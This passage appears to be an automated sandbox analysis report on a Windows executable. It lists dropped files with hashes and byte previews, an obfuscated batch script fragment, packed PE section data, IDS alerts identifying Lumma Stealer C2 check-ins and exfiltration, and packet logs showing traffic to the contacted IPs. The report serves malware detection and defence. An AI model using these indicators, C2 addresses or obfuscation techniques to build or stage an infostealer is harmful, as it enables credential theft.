Preview:	MSCF....hu......,......................................Y<. .Cooked..X.........Y<. .Receiver..(...@.....Y<. .Attractions.Q....h.....Y<. .Fingers..D..Q;.....Y<. .User.....Q......Y<. .Pot.....Q......Y<. .Alt.....Q......Y<. .Articles..T..] .....Y<. .Specialty./.s6.R..CK...xT..0\|f.$9$.3.."..:Z...pI.. L.Bp..........s.h.BO.9lF..V..Z..V........./.D..$"mw<Q.b2.....$...?...}Y{..../..;0R.......G...H....E.........r..wX..A)$KZ.........f..<../....Z.............ul....Z+..i)={.'.....PW..6OO5<..s.(....k.c...N.s.Z.g.."E..KH....k....%:6A;Cj...^.O..P.m.8._.3b.......?...Z..T..V.O...I....kEA.E&.\|..}...."...7...0."....Ep(...`8....Y;t+..y...&K ]RS.h.4...0AP.<Z..J..V.Pwmx.FE...,.uJm./.......k ...V....B....!u..ix.a.H.;.......gGM......bs..D..7....Q.....Id.S..4.{....*.(7..:.ym....wB)z..^C....15%\|.Ru.....\.[8.....'@9j~..E...p&.]..)0...Lzz%..m....w..Z8.Og...d.....%.B.D...t..~$6.... .C..Qs..z..............h..=..)....4H+`.v"5W.....h.....X..>O...}5m.lj......&..U?.1.....WN...,tC.IN.6+....

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\TNyOrM6mIM.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Specialty

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	152576
Entropy (8bit):	6.433958275406592
Encrypted:	false
SSDEEP:	3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:UK5vPeDkjGgQaE/loUDtf0aD
MD5:	D49F624EA007E69AFE1163955DDBA1BB
SHA1:	EE35A9CEAB1F6A40694B26094FDC7727658293D2
SHA-256:	4052653CEDFD2F560DA3BEE9825F88F60DBD053ABB3C064F3D19D98863B2962C
SHA-512:	63B1629E79C35E59923D4A1C12B93FEB45241EB0D2B59A03B9EB14BF76DAA82BA124710E8F4AA157D0C63BADFDCFFD916F049B85DE4B52CAA143F0DD32AD71E8
Malicious:	false
Preview:	hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..

C:\Users\user\AppData\Local\Temp\Symposium

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	ASCII text, with very long lines (1070), with CRLF line terminators
Category:	dropped
Size (bytes):	25405
Entropy (8bit):	5.118149909201556
Encrypted:	false
SSDEEP:	384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
MD5:	23812A6E32E38911133B221F39F9A20B
SHA1:	5B3B155889AB3A04ABDD1F195753E817ED3FDB23
SHA-256:	D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
SHA-512:	02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
Malicious:	false
Preview:	Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame

C:\Users\user\AppData\Local\Temp\Symposium.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1070), with CRLF line terminators
Category:	dropped
Size (bytes):	25405
Entropy (8bit):	5.118149909201556
Encrypted:	false
SSDEEP:	384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
MD5:	23812A6E32E38911133B221F39F9A20B
SHA1:	5B3B155889AB3A04ABDD1F195753E817ED3FDB23
SHA-256:	D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
SHA-512:	02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
Malicious:	false
Preview:	Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame

C:\Users\user\AppData\Local\Temp\User

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	148480
Entropy (8bit):	6.695251861322664
Encrypted:	false
SSDEEP:	3072:4cBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCh:4cB3gBmmLsiS+SAhClbfSCh
MD5:	A1E25E38AD59F032B7717CC6E5E00609
SHA1:	F7E7D770656E25F73BE807AC53F49776810099D5
SHA-256:	A39C8CC684FC60938C2F6CF62640F4B67F8C29A1EE75D172735B8384F8D79E8A
SHA-512:	4DDCF310A6FB0E21717A14EBD47C78043B792837F21BD13392B06D08C9D4CB974407218ECFAC94D03E23DEFFE2B6B613FB408EFB1A621913AF4D97A2424D4AEA
Malicious:	false
Preview:	f;...J....f...f;........B.f;...0....Pvf;........B.f;........Pvf;........B.f;........P...f;........B.f;........Pvf;.rw.B.f;.........Pf;.rc..Pf;........@...f;.rM.B.f;............f;.r7.B.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.v.j..F.Zf;.v......t"..uWj.[.]..Oj.Z.F.f;....w... ..........M...xt...Xt...u.j.[.].P.M..A.......u.j.[.]...1..M.....E.QPj.j..M..:....M..].3.E..M.j0Xf;.......j:Zf;.s....+..........f;...k....`...f;...s....P.f;.r.....f;...]....P.f;.r..f...f;...G....P.f;.r..Bvf;...3....P.f;.r..Bvf;........P.f;...z....Bvf;........P.f;...b....Bvf;........P.f;...J....f...f;........P.f;...0....Bvf;........P.f;........Bvf;........P.f;........P...f;........P.f;........Bvf;.rw.P.f;.........Pf;.rc..Pf;........@...f;.rM.P.f;............f;.r7.P.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.vUj..F.Zf;.vM............;}.s~.U..E...;..U..M.r<.u.w.;.r3;.u.;E.u.;].r%w.;}.v.....U..1j.Z.F....f;.w... ....PQ.u..u...........M...E.E..M...0....E.....V.

C:\Users\user\AppData\Local\Temp\Zone

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.997576222410487
Encrypted:	true
SSDEEP:	1536:eLQfqgBMCPA1XlKvwsSow5tLh2bBK3M1wY6FCUN8Pn+9BlGRpjyBGHS:1ICPA11KIjP5tLsbBKM176F7NVARcBGy
MD5:	6ECD89B15DFAEE100B13F894C76F9CEE
SHA1:	CFF0D1262CAD22201D25B331AFD9EB882865767F
SHA-256:	73D440F3C827B1B041209B7C9F2FD26D3BD6A5CDA3713B86BA965BF45AA46325
SHA-512:	6452A2A3DE1EC01DDA09ADF53C92A63C6AC830B3DC61CF305C08BAF5BD8FEB14EE67BD1B2BF7B8B61A46E8D3E9B23FB4097CB4565092840F6811084C98CEBC74
Malicious:	false
Preview:	/..GG..z..>.p(.....!}..h..}..O.;....."}$48...Bk.a-,n."..n.1&.. ..........c....<i`p...'.....E3.&..Q.y......oX.W:.u.....`.....?.l..uFWV..(H.u.......H.....(%8...x,...h.i..w.y...#...\.`V'v.2..F1S+4.c.3..j.Z.r.d.b.6.h....=....yH.:.....a..m...)a...w;.=4...\i....p.'.p.$.?x....T...!G<.W4......Q.qG..B05.t..tP.E....r.S.Gx.........1~...%.6..I........4..T7...$u:...4.WC^.2v..t....E.....%....t].D....4$.U...&.h. Im..Y"{,...\|...?[9[..";6....~.$2P...Fb.....UZ^9&.....!..}."<.y...?....\|..Y........$......>.V.Be....l^.&.h%Z.f..6........3.n.Sg......MU.^&..A..=.b.......e"..5p...i..r.$.R.%.f..8.2`.C."r._..9.6-.b.y.y5n...L.W...?$......r..>.....A...q.....Q...E.c..[.Qho..C..G.....:.K.NT.mQ..$.s..y...F...=..\....Y=.r.U....P..0..._u.....ib...r.....V.(.)..R....1..k.h..[0....1r4.......T\p..<...n..;4\D+......u\|7.s2>..60...n.,... ...X..1=...N.6.pC....@l.....p...<(....../..G.t4....7wp+...r.J%...0.N....g....]..\|..n.......o.Lx..q.S...B.5],.M.H.P...@B...g.js.N.fY..9..{..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.983037274902511
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TNyOrM6mIM.exe
File size:	7'080'960 bytes
MD5:	ec19fa1027fee164803cc127aef64199
SHA1:	8a1c7cd16c432a67eb9d71fe745d5ce5e4315dfd
SHA256:	bb6ed22605e38edeea643fc3ef43ced73ba96cc3740f8e1d4332932a36d45a41
SHA512:	3f11ccce6a0b870e8596e24d2b91d492c8a7d6b6e8d5a0d868a0db90d03a76f0d1c91907bfe98e95d2542deceb39c66a5ce69114d980d61e5bcff4ec1a5c4a78
SSDEEP:	98304:47RIWaDhDFxHWAW8+xfbZV1IucY8j8NHM3lngV++ZKHWywyfQmZ:4FItx3WhxFVgY88HM3NgV++Z2WuI+
TLSH:	4A66339E27A58FE9C1B2A0774283FE70A8B9A67552314BFCD54EC0CB03B1B5B1D68C51
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.ng..................x.............. ... y...@.. ................................l...@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xfda000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676E9445 [Fri Dec 27 11:49:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FD6F941857Ah
pminsw mm5, qword ptr [ebx+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FD6F941A575h
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x794055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x792000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7941f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x790000	0x518a00	9bad2a9ddda64eae69c1423ecab0f850	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x792000	0x53c	0x400	d719efedd7f7607e6cedae2d41d0b7e4	False	0.68359375	data	5.663825919736309	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x794000	0x2000	0x200	a0232179652c49de360269397bdb9eca	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x796000	0x29e000	0x200	5cd291466398d298f2bd68363c389880	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fsurptkt	0xa34000	0x1a4000	0x1a3200	a7d6b5e3f9defa7c78a093a47c1ff8a7	False	0.9944674079182821	OpenPGP Public Key	7.953041341484228	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mtouvxvi	0xbd8000	0x2000	0x600	aa5bca6034407efa50c45b33e9034974	False	0.6015625	data	5.112541887484424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xbda000	0x4000	0x2200	0fc3c68677b91c6f572f3b1bb8d23fe3	False	0.04790900735294118	DOS executable (COM)	0.4832992383468795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbd6bac	0x244	data			0.4689655172413793
RT_MANIFEST	0xbd6df0	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T09:56:59.566499+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49718	104.21.2.51	443	TCP
2024-12-28T09:57:00.389426+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.12	49718	104.21.2.51	443	TCP
2024-12-28T09:57:00.389426+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.12	49718	104.21.2.51	443	TCP
2024-12-28T09:57:01.657556+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49721	104.21.2.51	443	TCP
2024-12-28T09:57:02.458749+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.12	49721	104.21.2.51	443	TCP
2024-12-28T09:57:02.458749+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.12	49721	104.21.2.51	443	TCP
2024-12-28T09:57:04.092642+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49722	104.21.2.51	443	TCP
2024-12-28T09:57:06.345220+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49723	104.21.2.51	443	TCP
2024-12-28T09:57:08.729694+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49724	104.21.2.51	443	TCP
2024-12-28T09:57:11.179091+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49725	104.21.2.51	443	TCP
2024-12-28T09:57:12.023579+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.12	49725	104.21.2.51	443	TCP
2024-12-28T09:57:13.643766+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49726	104.21.2.51	443	TCP
2024-12-28T09:57:17.397219+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49728	104.21.2.51	443	TCP
2024-12-28T09:57:18.198459+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.12	49728	104.21.2.51	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:56:36.596054077 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:36.596102953 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:36.596177101 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:36.603445053 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:36.603476048 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:38.401170969 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:38.432570934 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:38.432605028 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:38.433811903 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:38.433898926 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:38.523180962 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:38.523382902 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:38.627373934 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:38.627398968 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:38.670610905 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:38.711330891 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:39.210536003 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:39.210720062 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:39.210793972 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:39.211869001 CET	49711	443	192.168.2.12	3.218.7.103
Dec 28, 2024 09:56:39.211890936 CET	443	49711	3.218.7.103	192.168.2.12
Dec 28, 2024 09:56:53.637619972 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.757579088 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.757719994 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.758671045 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.878274918 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878319979 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878349066 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878376007 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.878386021 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878433943 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878448009 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.878468990 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878565073 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878570080 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.878576994 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878659010 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.878779888 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878793001 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.878860950 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.997847080 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.997963905 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.997987986 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.998008013 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.998038054 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.998133898 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.998179913 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.998183966 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.998204947 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:53.998224974 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:53.998264074 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.041857004 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.041955948 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.157929897 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.158052921 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.201936007 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.318305969 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.318434954 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.525857925 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.526053905 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.765846968 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.765966892 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.772185087 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.772456884 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.772540092 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.885457039 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.885566950 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.893167019 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893172026 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893177986 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893182993 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893210888 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893214941 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893218994 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893223047 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893232107 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893235922 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893239021 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893243074 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893265009 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.893302917 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.893348932 CET	80	49714	194.87.58.92	192.168.2.12
